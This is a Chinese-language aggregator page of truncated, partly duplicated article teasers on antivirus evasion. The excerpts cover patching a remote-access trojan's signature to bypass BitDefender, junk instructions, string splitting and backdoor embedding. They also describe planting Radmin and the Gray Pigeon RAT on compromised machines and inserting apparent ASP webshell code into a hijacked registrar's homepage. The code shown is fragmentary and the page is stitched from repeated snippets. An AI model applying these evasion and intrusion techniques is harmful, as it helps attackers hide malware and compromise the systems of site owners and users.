来源:人民网介绍种新免杀思路方法！今天定位个远控过BitDefender特征码！！！地址00496034！！！！我们看看具体代码！！ 0049602D: 75 F9 JNZ SHORT 00496028 0049602F: 51 PUSH ECX 00496030: 53 ... [阅读全文]

昨天也不知怎就搞到中国域名网权限了搞了很久有自动备份 转入正题: 1.随便找他个页面然后把如下内容分开插入到它主页了注意下上下文内容(fso): % dim objFSO % % dim fdata % % dim objCountFile % % on error resume next % % Set objFSO = Server.createObject("Scripting.File... [阅读全文]

来源:安全中国本人点建议 做免杀定要会脱壳 虽然不要求你能脱掉所有壳 但是般壳定要会 北斗还是很好脱. 不然如果不会脱壳 不把壳脱掉 免杀就好比是空中楼阁 建议兄弟们定要看完 对你会有所帮助 天天看别人教程做免杀 不如自己会免杀技术. 这些就是基础知识了 定要掌握 多多练手就会了 .机械码,又称机器码. ultraedit打开,编辑exe文件时你会看到 许许多多由0,1,2,3,4,5,6,7,8... [阅读全文]

.机械码,又称机器码.ultraedit打开,编辑exe文件时你会看到许许多多由0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F组成数码,这些数码就是机器码.修改时必须通过修改机器码来修改exe文件. 2.需要熟练掌握全部汇编知识(只有这么多)不大容易理解,可先强行背住,混个脸儿熟,以后慢慢就理解了cmp a,b 比较a和bmov a,b 把b值送给aret 返回主nop 无作用,英... [阅读全文]

.花指令概念:花指令是堆汇编指令组成,对于来说,是堆废话,加不加花指令都不影响正常运行.编写花指令要终始保持堆栈平衡. 2.写花指令原则:写花指令基本原则就是要保持堆栈平衡. 写花指令细细品味下面段比喻: 我们把段花指令比喻成道数学运算题,把汇编指令(push pop等)比喻成加减乘除,把寄存器或数据(eax,ebx,1等)比喻成数字(1,2,3等),那么要保持花指令堆栈平衡,等于保持这道数学题结... [阅读全文]

今天给大家谈下免杀小窍门技巧技术不大全是经验希望大家看完后有所收获1:004B3920: 64:8910 MOV FS:[EAX],EDX004B3923: 68 35454B00 PUSH 4B4535 -------------替换处(2)004B3928: E8 83D3FFFF CAL... [阅读全文]

 测试环境:Windows Server 2003 Sp1. 磁盘格式NTFS  这里免杀跟加壳改特征码点关系都没有.所以新手不要害怕.我般呢就是在肉鸡上种Radmin+灰鸽子+500)this.width=500" border=0 看到了吧.如果释放出来.就应该不会被杀了.(不过在我测试中发现那txt文本也会被卡巴XX掉.可能是卡巴太厉害了吧.) ... [阅读全文]

文章作者:无敌最寂寞[-273℃@EST]信息来源:邪恶 8进制 中国 以前在x上发表过篇逆向工程 打造隐蔽后门文章讲述了如何在个可执行文件中嵌入后门代码思路方法但是这种思路方法很有可能被杀毒软件Software给查到因此这次我们要打造免杀后门 先看看我们需要什么“家伙”:Olly debug 1.10b 汉化版 —— 逆向主要工具UltraEdit —— 经典16进制编辑器PEDITOR v... [阅读全文]

作者:cnqing 来自:朋友家http://friend.91eb.com 昨天也不知怎就搞到中国域名网权限了搞了很久有自动备份 转入正题: 1.随便找他个页面然后把如下内容分开插入到它主页了注意下上下文内容(fso): % dim objFSO % % dim fdata % % dim objCountFile % % _disibledevent= % Trim(request... [阅读全文]

.机械码,又称机器码.ultraedit打开,编辑exe文件时你会看到许许多多由0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F组成数码,这些数码就是机器码.修改时必须通过修改机器码来修改exe文件. 2.需要熟练掌握全部汇编知识(只有这么多)不大容易理解,可先强行背住,混个脸儿熟,以后慢慢就理解了cmp a,b 比较a和bmov a,b 把b值送给aret 返回主nop 无作用,英... [阅读全文]

下面是修改详细思路方法(我用”explorer.exe”作为例子修改)　　1、　　# //加个头文件　　/*……*/　　char *str1,*str2,*str3,*str4;　　strcpy (str1,”exp”); //复制”exp”到str1　　strcpy (str2,”plorer”);　　strcpy (str3,”exe”);　　strcat (str1,str2); //将st... [阅读全文]

Ultraedit打开，编辑exe文件时你会看到许许多多的由0、1、2、3、4、5、6、7、8、9、A、B、C、D、E、F组成的数码，这些数码就是机器码。修改程序时必须通过修改机器码来修改exe文件。二.需要熟练掌握的全部汇编知识 不大容易理解，可先强行背住，混个脸儿熟，以后慢慢的就理解了。 cmp a,b 比较a与b。 mov a,b 把b的值送给a。 ret 返回主程序。 nop 无作用，英... [阅读全文]